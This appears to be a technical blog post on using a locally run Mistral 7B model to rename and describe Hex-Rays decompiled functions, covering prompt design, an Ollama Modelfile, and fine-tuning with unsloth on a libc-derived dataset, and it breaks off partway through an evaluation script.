pulling b26e6713dc74... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 2.4 GB
pulling fa8235e5b48f... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏ 1.1 KB
pulling 542b217f179c... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  148 B
pulling 8dde1baf1db0... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏   78 B
pulling f91db7a2deb9... 100% ▕██████████████████████████████████████████████████████████████████████████████████████████████████████████▏  485 B
verifying sha256 digest
writing manifest
removing any unused layers
success
>>> write me a sentence for my blog post about using a local running LLM to assist reversing binary applications.
 "Utilizing a local language model (LLM) tailored for our environment empowers developers to efficiently reverse binary applications, enhancing the debugging and
understanding of complex software systems."

>>> /bye

With the boring up-front details out of the way, we can try and do something useful.

Hammer Looking for Nails

As with any tool, it works best if you have a specific use case you are looking to apply it to, in this case we will be looking at using a model to help analyze Hex-Rays pseudocode. As pseudocode is close to C, most models that have been trained to include code should be able to aid with this task, in this case I have chosen to work with Mistral's 7b model. While there are larger models available that I could run on my hardware, this model has been found to perform quite well for its size and I really wanted to target something that would be relatively performant on lower end hardware.

Prompting Your Way Out

The first step in this process is to understand how well the model will execute a given task and identify the instructions needed to get a useful response. The following prompt was executed:

Analyze the following code and provide a description of what it does. Based on analysis provide updated variable names to replace the current ones.
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The prompt produced the following output:

The given code defines a function named `sub_C385C` that takes an integer argument `a1`. Inside the function, an integer variable `v1` is declared and initialized with the value of the memory location pointed to by `byte_11A2DC` with index `a1`.

Next, a check is made whether the result of calling `sub_CE2BC(0)` is true. If it is, then the value of `v1` is OR-ed with the binary number 4. The resulting value is assigned to a new variable `v2`, which remains undeclared in the given code snippet.

Finally, the original variable `v1` has its bits andered using the bitwise AND operator with the binary number -5 (0xFFFFFFFD) and this result is returned from the function.

To improve the readability of the code, you could consider renaming variables as follows:

```c
unsigned int __fastcall get_value_from_array(int arrayIndex)
{
  unsigned int value;

  value = memoryLocation[arrayIndex]; // Assuming memoryLocation is a properly defined pointer to the memory location pointed to by byte_11A2DC

  if ( checkCondition() )
    value |= 4; // OR with constant 4

  return value & 0xFFFFFFFD; // AND with binary number -5
}

Note: Replace `memoryLocation` and `checkCondition` with actual variable names.

This response is promising looking, but trying to programmatically use this response would be difficult. We can do better by adjusting our prompt to include instructions to return the values in JSON:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The following output was generated:

{
  "function_name": "process_byte_value",
  "comment": "This function takes an integer input, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.",
  "variables": [
    {
      "name": "input",
      "type": "int"
    },
    {
      "name": "byte_value",
      "type": "int"
    },
    {
      "name": "additional_flag",
      "type": "unsigned int"
    },
    {
      "name": "global_array",
      "type": "unsigned int[]",
      "description": "Global array of byte values."
    }
  ]
}

// The function named 'process_byte_value' takes an input integer, retrieves the corresponding byte value from a global array, performs a condition check and returns the processed byte value.

unsigned int process_byte_value(int input) {
  int byte_value;
  unsigned int additional_flag = 0;

  if (sub_CE2BC() == true) { // Perform some global flag check here
    additional_flag = 4;
  }

  byte_value = global_array[input]; // Retrieve the corresponding byte value from the global array.

  return (byte_value & 0xFFFFFFF8) | additional_flag; // Perform bitwise operations on the byte_value and additional_flag before returning

Running the same input another time, we get a slight variation on the output

{
  "function_name": "processInputByte",
  "comment": "This function processes an input byte by checking a specific condition and modifying the byte accordingly.",
  "variables": [
    {"name": "inputByte", "type": "int"},
    {"name": "byteMask", "type": "unsigned int"},
    {"name": "conditionMet", "type": "bool"},
    {"name": "processedByte", "type": "unsigned int"}
  ]
}

// This function processes an input byte by checking a specific condition and modifying the byte accordingly.
unsigned int processInputByte(int inputByte) {
  unsigned int processedByte = BYTE_11A2DC[inputByte]; // Load byte from memory location
  bool conditionMet = sub_CE2BC(0); // Check specific condition

  if (conditionMet) {
    processedByte |= 4; // Set specific bit in the byte if condition is met
  }

  return processedByte & 0xFFFFFFFD; // Return the processed byte with certain bits cleared.

Neither of these are ideal as we only want the JSON structure to parse programmatically. By adjusting the prompt we can try to guide the output towards what we are expecting:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does. Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.

unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

The resulting output of this prompt:

{
  "function_name": "processInputByte",
  "comment": "This function takes an input integer and processes a byte from a lookup table based on the input. If a certain condition is met, a bit is set in the output.",
  "variables": [
    {
      "name": "input",
      "description": "The input integer"
    },
    {
      "name": "byteValue",
      "description": "The value of the byte from the lookup table corresponding to the input"
    },
    {
      "name": "outputBitSet",
      "description": "An output variable that has a bit set if the condition is met"
    },
    {
      "name": "lookupTable",
      "description": "A global lookup table used to retrieve the byte value based on the input"
    }
  ]
}

This output is much better, it follows our instructions and produced a valid json structure only; however, if we run the same input again the output varies and returns a slightly different structure, along with details outside the JSON:

{
  "function_name": "process_byte_value",
  "comment": "Processes a byte value from the memory location specified by the input parameter and returns the result.",
  "variables": [
    {
      "name": "input_index",
      "type": "int",
      "description": "The index of the byte value to be processed."
    },
    {
      "name": "processed_value",
      "type": "unsigned int",
      "description": "The processed value of the input byte."
    },
    {
      "name": "is_special_condition_met",
      "type": "int",
      "description": "Flag indicating whether a special condition is met or not."
    }
  ]
}

unsigned int process_byte_value(int input_index)
{
  unsigned int processed_value;
  int is_special_condition_met = sub_CE2BC(0);

  processed_value = byte_11A2DC[input_index];

  if (is_special_condition_met)
    processed_value |= 4;

  return processed_value & 0xFFFFFFFD;
}

We could continue down this path changing the instructions trying to describe what your expected output should be for the given input, but eventually the response will end up deviating in some way breaking the ability to programmatically interface with it. Instead of trying to describe what we want, we can provide an example of what we want it to generate (single/multi-shot prompting). An important thing to remember when dealing with a LLM is that it is predicting the next token/word to output based on current input, by providing an example exchange you are creating a pattern for it to follow. The following revised prompt shows the original prompt modified to provide a single-shot example:

Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:
unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}

In this prompt we have provided the instructions as we had previously as well as an example showing what a user would submit and the expected response, followed by the actual code we want analyzed. In this case, the responses match our desired output and are consistent across multiple executions.

Initial generated response:

{
  "function_name": "checkAndModifyByteValue",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC. If the sub_CE2BC function returns true, the value at that index is modified by setting the 4th bit to 1. The function then returns the original value with the 3 highest bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ModifiedByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByteWithBitSet"
    }
  ]
}

Followup executions:

{
  "function_name": "analyze_byte_from_array_and_apply_condition",
  "comment": "This function uses the argument a1 as index into byte_11A2DC, applies a condition using external function sub_CE2BC, and returns a bitwise value based on the result.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "AnalyzedByte"
    },
    {
      "original_name": "v2",
      "new_name": "ConditionalValue"
    }
  ]
}

{
  "function_name": "newFunctionName",
  "comment": "This function takes an integer argument a1, retrieves a value from the memory location byte\\_11A2DC with the index a1, and if the sub\\_CE2BC function returns true, sets a new variable value to the original value orpped with 4. The final return is a bitwise AND of the original value with 0xFFFFFFFD.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ResultVar"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedVar"
    }
  ]
}

{
  "function_name": "checkBitAndModifyByte",
  "comment": "This function uses the argument a1 as an index into byte_11A2DC, checks if sub_CE2BC returns true and modifies the value if it does by setting the 4th bit. It then returns the original value with some bits cleared.",
  "variables": [
    {
      "original_name": "v1",
      "new_name": "ByteValue"
    },
    {
      "original_name": "v2",
      "new_name": "ModifiedByte"
    }
  ]
}

The results are decent and do not stray from the format/content we provided in our prompt; we can even include more examples with varying content (multi-shot) if we wanted to. At this point we have a basic prompt that does a specific task that we want relatively well, and the response is parsable (JSON) for automated use.

Light Customization

In the case you have a specific use case (agent/assistant/task) you can configure a version of your underlying pre-trained weights for use through Ollama's Modelfile interface. Ollama's Modelfile provides a lightweight layer to control/configure precomputed weights that can be easily edited and shared with other users. The following shows an example Modelfile configured for our potential Hex-Rays assistant using the prompt we created:

# defines the base pre-computed weights we want to use
FROM mistral:7b-instruct

# template is the format of the interactions with the model
# this is using templating provided by ollama where .System
# and .Prompt  are replaced with the defined variables 
TEMPLATE "{{ .System }}
[INST]
{{ .Prompt }}
[/INST]
"

# SYSTEM is the prompt/text that the model is started with, there are some special values included within this prompt
# that are described below, for now this is where the prompt we developed earlier goes
SYSTEM """<s>[INST]Analyze the following code and provide a description of what it does. Based on analysis provide a new function name, new variable names, and a comment describing what the code does.
Only respond with valid JSON using the keys 'function_name','comment', and an array 'variables'. Values should use plain ascii with no special characters. Do not respond outside the specified JSON structure.
For example, the user will submit code for analysis:

unsigned int __fastcall sub_C1337(int a1,int a2)
{
  int v1;
  unsigned int v2;

  v1 = byte_fff[a1 + a2];
  if ( v1 )
    v2 = v1 + 0xFF
  return v1 & 0xFFFFFFFD * v2;
}

Your response would be:
{
"function_name": "new_function_name",
"comment": "This function uses the arguments a1 and a2 as index into byte_fff, returning a bitwise value based on the result of the called function subCE2BC.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName"},"original_name":"v2","new_name":"AnalyzedVarName"}]
}

Analyze the following code:[/INST]
</s>
"""
PARAMETER stop [INST]
PARAMETER stop [/INST]
# these control internal settings within the model to adjust how it behaves
PARAMETER temperature 1.2
PARAMETER top_k 100
PARAMETER top_p 0.09
PARAMETER num_ctx 4096
PARAMETER repeat_last_n 512
PARAMETER repeat_penalty 1.1

To side track for a second, each model has its own prompt format that is required to be used, as well as specific tokens used to indicate what is an instruction as well as start/stop tokens - these values can be found within the Tokenizer configuration file (tokenizer_config.json). For instance, the Mistral 7b-Instruct (https://huggingface.co/mistralai/Mistral-7B-Instruct-v0.1/blob/main/tokenizer_config.json) defines the special values and format we used in our Modelfile:

{
  ...
  ...
  "bos_token": "<s>",
  "chat_template": "{{ bos_token }}{% for message in messages %}{% if (message['role'] == 'user') != (loop.index0 % 2 == 0) %}{{ raise_exception('Conversation roles must alternate user/assistant/user/assistant/...') }}{% endif %}{% if message['role'] == 'user' %}{{ '[INST] ' + message['content'] + ' [/INST]' }}{% elif message['role'] == 'assistant' %}{{ message['content'] + eos_token + ' ' }}{% else %}{{ raise_exception('Only user and assistant roles are supported!') }}{% endif %}{% endfor %}",
  "clean_up_tokenization_spaces": false,
  "eos_token": "</s>",
  ...
  ...
}

Not all models use the same chat_template structure or beginning-of-string (bos_token) or end-of-string (eos_token) values, so it is worth understanding where those formats and tokens come from.

After saving this file to disk (idapal_simple.modelfile), it can be loaded using Ollama:

% ollama create iDAPalSimple -f idapal_simple.modelfile
transferring model data
using existing layer sha256:e8a35b5937a5e6d5c35d1f2a15f161e07eefe5e5bb0a3cdd42998ee79b057730
using existing layer sha256:43070e2d4e532684de521b885f385d0841030efa2b1a20bafb76133a5e1379c1
using existing layer sha256:2af02daf0820d322d7e928bec1d7398090f4679c49c24c67575b5cffa7f08668
creating new layer sha256:cd2ecea3b680dc83a3d3981ec5efcca96c74f7b5794e7008d8f94522bf024f0d
using existing layer sha256:b4f4d07d73c548c4cd652806db6d567ceff891910db2bf5d5410dcc7e76eeb5a
creating new layer sha256:96a6cc4cffa5e48e458c33efa5301f519279a08eb51ae4a9b33e9ac7abce76d9
writing manifest
success

After creation, the new configuration can be tested by entering the interactive mode via the run command and pasting in the previous code:

% ollama run iDAPalSimple
>>> unsigned int __fastcall sub_C385C(int a1)
... {
...   int v1;
...   unsigned int v2;
...
...   v1 = byte_11A2DC[a1];
...   if ( sub_CE2BC(0) )
...     v2 = v1 | 4;
...   return v1 & 0xFFFFFFFD;
... }
{
"function_name": "new_function_name_C385C",
"comment": "This function uses the argument a1 as an index into byte\_11A2DC. It calls sub\_CE2BC with an argument of 0 and sets v2 to the result of
bitwise OR operation between v1 and 4 if sub\_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between
v1 and 0xFFFFFFFD.",
"variables":[{"original_name":"v1","new_name":"AnalyzedVarName_C385C"},{"original_name":"v2","new_name":"AnalyzedVarName_C385C_v2"}]
}

The observed response shows that the model works and is using the configured system prompt, returning the expected result after being provided only a code block as input. Ollama also provides an API that can be accessed locally (https://github.com/ollama/ollama/blob/main/docs/api.md), this can be used as seen in the following simple Python client:

import requests,json

def do_analysis(code):
    url = "http://localhost:11434/api/generate"
    headers = {"Content-Type": "application/json"}
    # inform the API we are using our configured model
    payload = {"model": "iDAPalSimple", "prompt": code, "stream": False,"format": "json"}
    res = requests.post(url, headers=headers, json=payload)
    try:
        t = res.json()['response']
        t = json.loads(t)
        return t
    except:
        print(f'error unpacking response')
        print(res.json()['response'])


input_code = '''unsigned int __fastcall sub_C385C(int a1)
{
  int v1;
  unsigned int v2;

  v1 = byte_11A2DC[a1];
  if ( sub_CE2BC(0) )
    v2 = v1 | 4;
  return v1 & 0xFFFFFFFD;
}'''

result = do_analysis(input_code)
print(result)

% python simple_analysis.py
{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}

At this point, the current configuration and simple Python client could be integrated into an IDA Plugin that would work ok, but we can do better.

Fine-Tuning - step one: draw two circles

The initial training and creation of model weights that are released is a computationally expensive process, while follow on fine-tuning training is much less expensive to conduct. Fine-tuning provides a path to give a pre-trained model a "personality" by introducing new data and/or example interactions that would be considered "ideal" behavior when interacting with a user. The process is iterative and can be conducted multiple times until the model matches the expected behavior when interacting with a user.

While our small local model is never going to compete with a large, hosted service, fine-tuning can be used to boost its performance and compete on specific tasks or knowledge domains. To carry out a fine tune of a model you need complete the following steps:

Identify a target knowledge domain
Construct a dataset for your target domain
Train against your dataset
Evaluate trained model

For this task, the knowledge domain is already known - we want to fine tune a model that can be used to aid with analysis of Hex-Rays pseudocode. The next step is constructing a dataset, this is the difficult part. At a high level the dataset that needs to be built will be made of "instruction-following" examples, for instance the following shows what this would look like:

{
  "instruction":"Assist the user with a helpful process for drawing an animal.",
  "input":"How do I draw an Owl?",
  "output":"Drawing an Owl is simple, first draw some circles, then you draw the rest of the Owl."
},
{
  "instruction":"Assist the user with an idea for an animal to draw and provide them instructions.",
  "input":"",
  "output":"There are many animals you could choose to draw, my favorite is the Owl. An Owl is a fairly basic animal to draw, first draw some circles, then you draw the rest of the Owl"
}

These examples provide two types of instruction-following dataset entries. The first example starts by specifying the instruction to be followed with a matching input (user input) and finally the ideal output (generated result). The second example only provides an instruction along with an example output - the second example is useful for generative only responses that do not require user input, this type is not that useful for our current task but was included as an example. A dataset entry that would be useful for our task would look like the following:

{
  "instruction":"Analyze the following IDA Hex Rays pseudocode and generate a valid JSON object containing the keys 'function_name','comment', and an array 'variables' explaining what the code does, suggest a function name based on the analysis of the code, and new variable names based on the analysis of the code.",
  "input":"unsigned int __fastcall sub_C385C(int a1)\n {\n int v1;\n unsigned int v2;\n\n v1 = byte_11A2DC[a1];\n if ( sub_CE2BC(0) )\n v2 = v1 | 4;\n return v1 & 0xFFFFFFFD;\n }",
  "output":"{'function_name': 'new_function_name', 'comment': 'This function uses the argument a1 as an index into byte_11A2DC. It calls sub_CE2BC with an argument of 0 and sets v2 to the result of bitwise OR operation between v1 and 4 if sub_CE2BC returns true. The final return value is obtained by performing a bitwise AND operation between v1 and 0xFFFFFFFD.', 'variables': [{'original_name': 'v1', 'new_name': 'AnalyzedVarName1'}, {'original_name': 'v2', 'new_name': 'AnalyzedVarName2'}]}"
}

As a side note, following this exact formatting in JSON will allow for using the datasets library from Hugging Face and is going to be a common format.

With the exact format needed for training identified, the next problem is that we really need thousands of these examples, ideally with high quality responses. I had considered trying to manually create the required dataset using tree-sitter to rewrite valid code with generic variable names while sourcing the function description from documentation, this sounded painful, and I wanted the machine to do the hard work for me. Looking at earlier work done by Stanford for the Alpaca project (https://crfm.stanford.edu/2023/03/13/alpaca.html) I decided to try the same style of approach. The basic idea of this workflow is to use a LLM to build your dataset based on a smaller dataset, or in this case an incomplete dataset and train against that:

After some noodling around I came up with the following high-level process:

compile libc with full debug/symbol information
load the compiled libraries into IDA and export all functions Hex-Rays output into individual files by address
strip the compiled libraries and repeat the previous step, exporting all functions Hex-Rays output into a new set of files

This process creates two directories with matching files:

/symbol/0x2d7f4.c
/stripp/0x2d7f4.c

In this case the file /symbol/0x2d7f4.c contains:

void __fastcall setname(int category, const char *name)
{
  char *v3; // r0

  v3 = (char *)nl_global_locale.__names[category];
  if ( v3 != name )
  {
    if ( v3 != "C" )
      j___GI___libc_free(v3);
    nl_global_locale.__names[category] = name;
  }
}

And the file /stripp/0x2d7f4.c contains:

char *__fastcall sub_2D7F4(int a1, char **a2)
{
  char *result; // r0

  result = (char *)off_170C10[a1 + 16];
  if ( result != (char *)a2 )
  {
    if ( result != "C" )
      result = (char *)j_free();
    off_170C10[a1 + 16] = a2;
  }
  return result;
}

With the two sets of data, the next stage of processing is to generate the dataset records. At a high-level this process looks like the following:

using the previously created mistral-7b configuration, query using the symbol/debug Hex-Rays output to get a reasonable quality output
create a dataset entry by combining the matching STRIPPED Hex-Rays output with the generated output from the symbol/debug Hex-Rays
iterate over all the files until complete

After completing this step we have a large completed instruction-following dataset we can use to fine tune against.

Heavy Customization

There are quite a few options when it comes to carrying out a fine tune of a LLM, at the time of this research project I chose to use unsloth. The following projects are also popular and most likely more batteries-included:

I went with unsloth for a few reasons, the main reason being underlying code has been tuned to provide a large performance increase (speed/memory usage), also it seemed less likely to abstract or hide parts of the training process that may be useful to see or understand. The unsloth project also provides a Jupyter notebook that can be executed on the Google Colab free tier if you do not have hardware (works perfectly!) - I ended up conducting training on a local Linux host with an NVIDIA 3090. To give an idea of performance, the free Colab tier took 21 minutes while my 3090 executed the same training in 7 minutes. Refer to the unsloth repository for install instructions, at the time of this project the installation using conda looked like the following:

conda create --name unsloth_env python=3.10
conda activate unsloth_env
conda install cudatoolkit xformers bitsandbytes pytorch pytorch-cuda=12.1 -c pytorch -c nvidia -c xformers -c conda-forge -y
pip install "unsloth[conda] @ git+https://github.com/unslothai/unsloth.git"

The script used for training was adopted from the examples provided by unsloth, the script uses Hugging Face's Supervised Fine-tuning Trainer (SFT) from the Transformer Reinforcement Learning (TRL) library:

from unsloth import FastLanguageModel
import torch,sys

model = sys.argv[1]
steps = int(sys.argv[2])
training_data = sys.argv[3]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
)

model = FastLanguageModel.get_peft_model(
    model,
    r = 32, # Choose any number > 0 ! Suggested 8, 16, 32, 64, 128 - r/rank is how strong you want your training to apply
    target_modules = ["q_proj", "k_proj", "v_proj", "o_proj",
                      "gate_proj", "up_proj", "down_proj",],
    lora_alpha = 16, # alpha is a multiplier against r/rank 
    lora_dropout = 0, # Supports any, but = 0 is optimized
    bias = "none",    # Supports any, but = "none" is optimized
    use_gradient_checkpointing = True,
    random_state = 3407,
    use_rslora = False,  # We support rank stabilized LoRA
    loftq_config = None, # And LoftQ
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files=training_data, split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)


from trl import SFTTrainer
from transformers import TrainingArguments

trainer = SFTTrainer(
    model = model,
    tokenizer = tokenizer,
    train_dataset = dataset,
    dataset_text_field = "text",
    max_seq_length = max_seq_length,
    dataset_num_proc = 2,
    packing = False, # Can make training 5x faster for short sequences.
    args = TrainingArguments(
        per_device_train_batch_size = 4,
        gradient_accumulation_steps = 4,
        warmup_steps = 5,
        max_steps = steps,
        learning_rate = 2e-4,
        fp16 = not torch.cuda.is_bf16_supported(),
        bf16 = torch.cuda.is_bf16_supported(),
        logging_steps = 1,
        optim = "adamw_8bit",
        weight_decay = 0.01,
        lr_scheduler_type = "linear",
        seed = 3407,
        output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50
    ),
)

gpu_stats = torch.cuda.get_device_properties(0)
start_gpu_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
max_memory = round(gpu_stats.total_memory / 1024 / 1024 / 1024, 3)
print(f"GPU = {gpu_stats.name}. Max memory = {max_memory} GB.")
print(f"{start_gpu_memory} GB of memory reserved.")

# execute the actual training
trainer_stats = trainer.train()

used_memory = round(torch.cuda.max_memory_reserved() / 1024 / 1024 / 1024, 3)
used_memory_for_lora = round(used_memory - start_gpu_memory, 3)
used_percentage = round(used_memory         /max_memory*100, 3)
lora_percentage = round(used_memory_for_lora/max_memory*100, 3)
print(f"{trainer_stats.metrics['train_runtime']} seconds used for training.")
print(f"{round(trainer_stats.metrics['train_runtime']/60, 2)} minutes used for training.")
print(f"Peak reserved memory = {used_memory} GB.")
print(f"Peak reserved memory for training = {used_memory_for_lora} GB.")
print(f"Peak reserved memory % of max memory = {used_percentage} %.")
print(f"Peak reserved memory for training % of max memory = {lora_percentage} %.")

model.save_pretrained(f"lora_model_{steps}") # Local saving

# Just LoRA adapters
if True: model.save_pretrained_merged(f"model_{steps}", tokenizer, save_method = "lora",)

# Save to q4_k_m GGUF
if True: model.save_pretrained_gguf(f"model_{steps}", tokenizer, quantization_method = "q4_k_m")

The script also defines the following items:

output_dir = "outputs",
        save_strategy= "steps",
        save_steps=50

This configuration will save a copy of the fine-tuned weights every 50 steps to a directory outputs - this is helpful for a few reasons. The first being if an error occurs at some point (crash/power/etc.) you have checkpoints you can restart your training from, the second being it allows you to effectively evaluate how well your training is working by comparing each saved checkpoint. While it may seem at first, more steps are better, this is going to be dependent on how large your dataset is and which settings you have configured - more is not always better.

Running this script to fine tune mistral-7b-instruct for 100 steps using the dataset we created would look like the following example output:

$ python training/train.py unsloth/mistral-7b-instruct-v0.2-bnb-4bit 100 ./dataset.json
==((====))==  Unsloth: Fast Mistral patching release 2024.2
   \\   /|    GPU: NVIDIA GeForce RTX 3090. Max memory: 23.691 GB. Platform = Linux.
O^O/ \_/ \    Pytorch: 2.2.0. CUDA = 8.6. CUDA Toolkit = 12.1.
\        /    Bfloat16 = TRUE. Xformers = 0.0.24. FA = False.
 "-____-"     Free Apache license: http://github.com/unslothai/unsloth
/mnt/new/unsloth/lib/python3.10/site-packages/transformers/quantizers/auto.py:155: UserWarning: You passed `quantization_config` or equivalent parameters to `from_pretrained` but the model you're loading already has a `quantization_config` attribute. The `quantization_config` from the model will be used.
  warnings.warn(warning_msg)
Unsloth 2024.2 patched 32 layers with 32 QKV layers, 32 O layers and 32 MLP layers.
Detected kernel version 5.4.0, which is below the recommended minimum of 5.5.0; this can cause the process to hang. It is recommended to upgrade the kernel to the minimum version or higher.
GPU = NVIDIA GeForce RTX 3090. Max memory = 23.691 GB.
4.676 GB of memory reserved.
==((====))==  Unsloth - 2x faster free finetuning | Num GPUs = 1
   \\   /|    Num examples = 2,897 | Num Epochs = 3
O^O/ \_/ \    Batch size per device = 4 | Gradient Accumulation steps = 4
\        /    Total batch size = 16 | Total steps = 500
 "-____-"     Number of trainable parameters = 83,886,080
{'loss': 1.4802, 'grad_norm': 1.6030948162078857, 'learning_rate': 4e-05, 'epoch': 0.01}
{'loss': 1.4201, 'grad_norm': 1.4948327541351318, 'learning_rate': 8e-05, 'epoch': 0.01}
{'loss': 1.5114, 'grad_norm': 1.6689960956573486, 'learning_rate': 0.00012, 'epoch': 0.02}
{'loss': 1.1665, 'grad_norm': 0.9258238673210144, 'learning_rate': 0.00016, 'epoch': 0.02}
{'loss': 0.9282, 'grad_norm': 0.6133134961128235, 'learning_rate': 0.0002, 'epoch': 0.03}
{'loss': 0.9292, 'grad_norm': 0.6610234975814819, 'learning_rate': 0.0001995959595959596, 'epoch': 0.03}
{'loss': 0.7517, 'grad_norm': 0.4809339940547943, 'learning_rate': 0.0001991919191919192, 'epoch': 0.04}
{'loss': 0.7554, 'grad_norm': 0.6171303987503052, 'learning_rate': 0.00019878787878787878, 'epoch': 0.04}
{'loss': 0.606, 'grad_norm': 0.564286470413208, 'learning_rate': 0.00019838383838383837, 'epoch': 0.05}
{'loss': 0.6274, 'grad_norm': 0.414183109998703, 'learning_rate': 0.000197979797979798, 'epoch': 0.06}
{'loss': 0.6402, 'grad_norm': 0.3489008843898773, 'learning_rate': 0.0001975757575757576, 'epoch': 0.06}
{'loss': 0.596, 'grad_norm': 0.28150686621665955, 'learning_rate': 0.0001971717171717172, 'epoch': 0.07}
{'loss': 0.5056, 'grad_norm': 0.3132913410663605, 'learning_rate': 0.00019676767676767677, 'epoch': 0.07}
{'loss': 0.5384, 'grad_norm': 0.27469128370285034, 'learning_rate': 0.00019636363636363636, 'epoch': 0.08}
{'loss': 0.5744, 'grad_norm': 0.360963374376297, 'learning_rate': 0.00019595959595959596, 'epoch': 0.08}
{'loss': 0.5907, 'grad_norm': 0.3328467011451721, 'learning_rate': 0.00019555555555555556, 'epoch': 0.09}
{'loss': 0.5067, 'grad_norm': 0.2794954478740692, 'learning_rate': 0.00019515151515151516, 'epoch': 0.09}
{'loss': 0.5563, 'grad_norm': 0.2907596528530121, 'learning_rate': 0.00019474747474747476, 'epoch': 0.1}
{'loss': 0.5533, 'grad_norm': 0.34755516052246094, 'learning_rate': 0.00019434343434343435, 'epoch': 0.1}

After training is complete, I used a small script to evaluate how each checkpoint performs. To do this I take the first 10 entries from the training dataset and use the instruction and input values to generate a new output, as well as generating a new output using an input that was not in the original dataset:

from unsloth import FastLanguageModel
import torch,sys

model_name_input = sys.argv[1]

max_seq_length = 4096 # Choose any! We auto support RoPE Scaling internally!
dtype = None # None for auto detection. Float16 for Tesla T4, V100, Bfloat16 for Ampere+
load_in_4bit = True # Use 4bit quantization to reduce memory usage. Can be False.

model, tokenizer = FastLanguageModel.from_pretrained(
    #model_name = "unsloth/mistral-7b-instruct-v0.2-bnb-4bit", # Choose ANY! eg teknium/OpenHermes-2.5-Mistral-7B
    model_name = model_name_input,
    max_seq_length = max_seq_length,
    dtype = dtype,
    load_in_4bit = load_in_4bit,
    # token = "hf_...", # use one if using gated models like meta-llama/Llama-2-7b-hf
)

alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

EOS_TOKEN = tokenizer.eos_token # Must add EOS_TOKEN
def formatting_prompts_func(examples):
    instructions = examples["instruction"]
    inputs       = examples["input"]
    outputs      = examples["output"]
    texts = []
    for instruction, input, output in zip(instructions, inputs, outputs):
        # Must add EOS_TOKEN, otherwise your generation will go on forever!
        text = alpaca_prompt.format(instruction, input, output) + EOS_TOKEN
        texts.append(text)
    return { "text" : texts, }
pass

#load and convert the dataset into the prompt format
from datasets import load_dataset
dataset = load_dataset("json", data_files="data.json", split = "train")
dataset = dataset.map(formatting_prompts_func, batched = True,)

FastLanguageModel.for_inference(model)
